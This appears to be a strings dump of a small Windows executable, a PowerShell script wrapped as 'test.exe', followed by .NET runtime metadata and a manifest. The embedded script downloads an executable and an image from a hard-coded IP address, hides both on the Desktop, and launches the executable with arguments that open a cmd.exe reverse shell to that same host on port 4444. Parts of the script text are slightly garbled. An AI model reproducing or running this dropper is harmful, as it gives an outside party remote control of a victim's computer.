!This program cannot be run in DOS mode.
`.rsrc
@.reloc
** x 2s
** x Ts
$X K
$X K
$X K
Z +X(Y
Z +X(Y
#Define the URL and output ut path
$url "http://185.195.26.95/idk.exe" # Replace with the actual URL
$desktopPath [System.Environment]::GetFolderPath([System.Environment+s cial Folder]:: Desktop)
$filename "idk.exe" #Replace with your desired file path SfinalPath Join-Path -Path SdesktopPath -ChildPath Sfilename
$ur12= "http://185.195.26.95/test.jpg"
$filename2 $finalPath2
"test.jpg" Join-Path -Path SdesktopPath -ChildPath $filename2
# Download the file
Invoke-webRequest -Uri Surl -OutFile SfinalPath
Set-ItemProperty -Path $finalPath -Name Attributes -value ([System.IO.FileAttributes]:: Hidden)
Invoke-WebRequest -Uri Sur12 -OutFile SfinalPath2
Set-ItemProperty -Path $finalPath2 -Name Attributes -Value ([System.IO.FileAttributes]:: Hidden)
# Define the parameters for the executable
$params"-d 185.195.26.95 4444 -e cmd.exe" # Replace with actual parameters
# Execute the file le with parameters
Start-Process -FilePath $finalPath -ArgumentList Sparams 23 Start-Process SfinalPath2
v4.0.30319
#Strings
<Module>
test.exe
Credential_Form
ModuleNameSpace
CREDUI_INFO
CREDUI_FLAGS
CredUI_ReturnCodes
User_Pwd
MainModuleRawUI
Input_Box
Choice_Box
ReadKey_Box
Keyboard_Form
Progress_Form
Progress_Data
Console_Info
FileType
STDHandle
MainModuleUI
MainModule
ConsoleColorProxy
MainAppInterface
MainApp
mscorlib
System
Object
ValueType
System.Management.Automation
System.Management.Automation.Host
PSHostRawUserInterface
System.Windows.Forms
PSHostUserInterface
PSHost
System.Text
StringBuilder
CredUIPromptForCredentials
PSCredentialTypes
PSCredentialUIOptions
PromptForPassword
cbSize
hwndParent
pszMessageText
pszCaptionText
hbmBanner
value__
INCORRECT_PASSWORD
DO_NOT_PERSIST
REQUEST_ADMINISTRATOR
EXCLUDE_CERTIFICATES
REQUIRE_CERTIFICATE
SHOW_SAVE_CHECK_BOX
ALWAYS_SHOW_UI
REQUIRE_SMARTCARD
PASSWORD_ONLY_OK
VALIDATE_USERNAME
COMPLETE_USERNAME
PERSIST
SERVER_CREDENTIAL
EXPECT_CONFIRMATION
GENERIC_CREDENTIALS
USERNAME_TARGET_CREDENTIALS
KEEP_USERNAME
NO_ERROR
ERROR_CANCELLED
ERROR_NO_SUCH_LOGON_SESSION
ERROR_NOT_FOUND
ERROR_INVALID_ACCOUNT_NAME
ERROR_INSUFFICIENT_BUFFER
ERROR_INVALID_PARAMETER
ERROR_INVALID_FLAGS
Password
Domain
ConsoleColor
GUIBackgroundColor
GUIForegroundColor
get_BackgroundColor
set_BackgroundColor
get_BufferSize
set_BufferSize
Coordinates
get_CursorPosition
set_CursorPosition
get_CursorSize
set_CursorSize
Invisible_Form
FlushInputBuffer
get_ForegroundColor
set_ForegroundColor
BufferCell
Rectangle
GetBufferContents
get_KeyAvailable
get_MaxPhysicalWindowSize
get_MaxWindowSize
KeyInfo
ReadKeyOptions
ReadKey
ScrollBufferContents
SetBufferContents
get_WindowPosition
set_WindowPosition
get_WindowSize
set_WindowSize
get_WindowTitle
set_WindowTitle
BackgroundColor
BufferSize
CursorPosition
CursorSize
ForegroundColor
KeyAvailable
MaxPhysicalWindowSize
MaxWindowSize
WindowPosition
WindowSize
WindowTitle
MB_GetString
DialogResult
System.Collections.ObjectModel
Collection`1
ChoiceDescription
ToUnicode
GetCharFromKeys
checkKeyDown
keyinfo
KeyEventArgs
Keyboard_Form_KeyDown
Keyboard_Form_KeyUp
ProgressBarColor
System.Timers
barNumber
barValue
inTick
System.Collections.Generic
List`1
progressDataList
System.Drawing
DrawingColor
InitializeComponent
ElapsedEventArgs
TimeTick
AddBar
GetCount
ProgressRecord
Update
lbActivity
lbStatus
ProgressBar
objProgressBar
lbRemainingTime
lbOperation
ActivityId
ParentActivityId
GetStdHandle
GetFileType
IsInputRedirected
IsOutputRedirected
IsErrorRedirected
FILE_TYPE_UNKNOWN
FILE_TYPE_DISK
FILE_TYPE_CHAR
FILE_TYPE_PIPE
FILE_TYPE_REMOTE
STD_INPUT_HANDLE
STD_OUTPUT_HANDLE
STD_ERROR_HANDLE
ErrorForegroundColor
ErrorBackgroundColor
WarningForegroundColor
WarningBackgroundColor
DebugForegroundColor
DebugBackgroundColor
VerboseForegroundColor
VerboseBackgroundColor
ProgressForegroundColor
ProgressBackgroundColor
Dictionary`2
PSObject
FieldDescription
Prompt
PromptForChoice
PSCredential
PromptForCredential
get_RawUI
ib_caption
ib_message
ReadLine
System.Security
SecureString
getPassword
ReadLineAsSecureString
WriteDebugLine
WriteErrorLine
WriteLine
WriteProgress
WriteVerboseLine
WriteWarningLine
parent
System.Globalization
CultureInfo
originalCultureInfo
originalUICultureInfo
get_PrivateData
_consoleColorProxy
get_CurrentCulture
get_CurrentUICulture
get_InstanceId
get_Name
get_UI
Version
get_Version
EnterNestedPrompt
ExitNestedPrompt
NotifyBeginApplication
NotifyEndApplication
SetShouldExit
PrivateData
CurrentCulture
CurrentUICulture
InstanceId
get_ErrorForegroundColor
set_ErrorForegroundColor
get_ErrorBackgroundColor
set_ErrorBackgroundColor
get_WarningForegroundColor
set_WarningForegroundColor
get_WarningBackgroundColor
set_WarningBackgroundColor
get_DebugForegroundColor
set_DebugForegroundColor
get_DebugBackgroundColor
set_DebugBackgroundColor
get_VerboseForegroundColor
set_VerboseForegroundColor
get_VerboseBackgroundColor
set_VerboseBackgroundColor
get_ProgressForegroundColor
set_ProgressForegroundColor
get_ProgressBackgroundColor
set_ProgressBackgroundColor
get_ShouldExit
set_ShouldExit
get_ExitCode
set_ExitCode
ShouldExit
ExitCode
shouldExit
exitCode
UnhandledExceptionEventArgs
CurrentDomain_UnhandledException
credinfo
targetName
reserved1
iError
userName
maxUserName
password
maxPassword
pfSave
System.Runtime.InteropServices
MarshalAsAttribute
UnmanagedType
caption
message
target
credTypes
options
rectangle
source
destination
origin
contents
strTitle
strPrompt
strVal
blSecure
arrChoice
intDefault
wVirtKey
wScanCode
lpKeyState
pwszBuff
OutAttribute
cchBuff
wFlags
blShift
blAltGr
blIncludeKeyDown
sender
position
BarColor
objRecord
stdHandle
descriptions
choices
defaultChoice
allowedCredentialTypes
foregroundColor
backgroundColor
sourceId
record
System.Reflection
AssemblyTitleAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
AssemblyDescriptionAttribute
AssemblyCompanyAttribute
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
DllImportAttribute
credui
String
IsNullOrEmpty
Marshal
SizeOf
IntPtr
ToString
StructLayoutAttribute
LayoutKind
FlagsAttribute
set_Opacity
set_ShowInTaskbar
Control
set_Visible
get_Bottom
get_Top
get_Right
get_Left
Address
BufferCellType
set_Height
set_Width
AppDomain
get_CurrentDomain
get_FriendlyName
user32.dll
ContainerControl
set_AutoScaleDimensions
AutoScaleMode
set_AutoScaleMode
TextBox
Button
set_Text
set_Location
Screen
FromControl
get_Bounds
get_Width
set_MaximumSize
set_AutoSize
ControlCollection
get_Controls
set_UseSystemPasswordChar
SetBounds
PtrToStringUni
set_DialogResult
set_ClientSize
AddRange
FormBorderStyle
set_FormBorderStyle
FormStartPosition
set_StartPosition
Assembly
GetExecutingAssembly
get_Location
ExtractAssociatedIcon
set_Icon
set_MinimizeBox
set_MaximizeBox
IButtonControl
set_AcceptButton
set_CancelButton
ShowDialog
get_Text
get_Count
RadioButton
ToolTip
IEnumerator`1
GetEnumerator
get_Current
get_Label
set_Checked
get_Height
get_HelpMessage
SetToolTip
System.Collections
IEnumerator
MoveNext
IDisposable
Dispose
set_ShowAlways
get_Checked
KeyEventHandler
add_KeyDown
add_KeyUp
get_KeyValue
set_VirtualKeyCode
get_KeyCode
get_Shift
get_Alt
get_Control
get_Chars
set_Character
set_KeyDown
ControlKeyStates
set_ControlKeyState
get_ControlKeyState
get_Modifiers
get_Black
get_Blue
get_Cyan
ColorTranslator
FromHtml
get_Magenta
get_Red
get_White
get_Yellow
SuspendLayout
ScrollableControl
set_AutoScroll
set_BackColor
set_ControlBox
ResumeLayout
ElapsedEventHandler
add_Elapsed
set_Interval
set_AutoReset
get_Item
set_Value
Refresh
set_Left
set_Top
get_Font
FontStyle
set_Font
ProgressBarStyle
set_Style
set_ForeColor
set_Size
get_ActivityId
ProgressRecordType
get_RecordType
Remove
System.ComponentModel
Component
RemoveAt
get_ParentActivityId
Insert
get_Activity
get_StatusDescription
get_PercentComplete
get_SecondsRemaining
TimeSpan
get_TotalHours
get_Minutes
get_Seconds
Format
Concat
get_CurrentOperation
Application
DoEvents
Kernel32.dll
MessageBox
get_ParameterAssemblyFullName
RuntimeTypeHandle
GetTypeFromHandle
GetType
get_IsArray
GetElementType
MakeGenericType
EmptyTypes
ConstructorInfo
BindingFlags
Binder
ParameterModifier
GetConstructor
Invoke
Convert
ChangeType
InvokeMember
op_Inequality
op_Equality
get_DefaultValue
Exception
ToCharArray
AppendChar
Console
ConsoleKeyInfo
ConsoleKey
get_Key
get_Length
get_KeyChar
System.Threading
Thread
get_CurrentThread
NewGuid
AsPSObject
ArgumentNullException
STAThreadAttribute
<>c__DisplayClass6
ManualResetEvent
DataAddedEventArgs
<Main>b__0
<Main>b__1
IAsyncResult
<Main>b__2
PSDataCollection`1
ErrorRecord
get_Index
get_Exception
get_Message
get_IsCompleted
EventWaitHandle
EnableVisualStyles
UnhandledExceptionEventHandler
add_UnhandledException
System.Management.Automation.Runspaces
RunspaceFactory
Runspace
CreateRunspace
ApartmentState
set_ApartmentState
PowerShell
Create
set_Runspace
PSDataStreams
get_Streams
get_Error
EventHandler`1
add_DataAdded
Complete
Compare
StringComparison
StartsWith
StringSplitOptions
MessageBoxButtons
MessageBoxIcon
System.Diagnostics
Debugger
Launch
System.IO
Stream
GetManifestResourceStream
Encoding
get_UTF8
StreamReader
TextReader
ReadToEnd
WriteAllText
AddScript
System.Text.RegularExpressions
get_Success
GroupCollection
get_Groups
Double
TryParse
AddParameter
Capture
get_Value
ToUpper
Boolean
AddArgument
AddCommand
AsyncCallback
PSInvocationSettings
BeginInvoke
WaitHandle
WaitOne
PSInvocationStateInfo
get_InvocationStateInfo
PSInvocationState
get_State
get_Reason
CompilerGeneratedAttribute
test.ps1
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Secure input:
Input:
Cancel
Press a key
#000080
#808080
#008000
#008080
#800080
#800000
#808000
#C0C0C0
#00FF00
Remaining time:
{0:00}:{1:00}:{2:00}
System.Collections.Generic.List
{0}[{1}]:
ToArray
(Type !? for help.)
Wrong format, please repeat input:
PSRunspace-Host
-extract
If you specify the -extract option you need to add a file for extraction in this way
-extract:"<filename>"
-debug
test.ps1
^-([^: ]+)[ :]?([^:]*)$
$FALSE
Out-String
Stream
Click OK to exit...
Unhandled exception in
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
test.exe
LegalCopyright
OriginalFilename
test.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0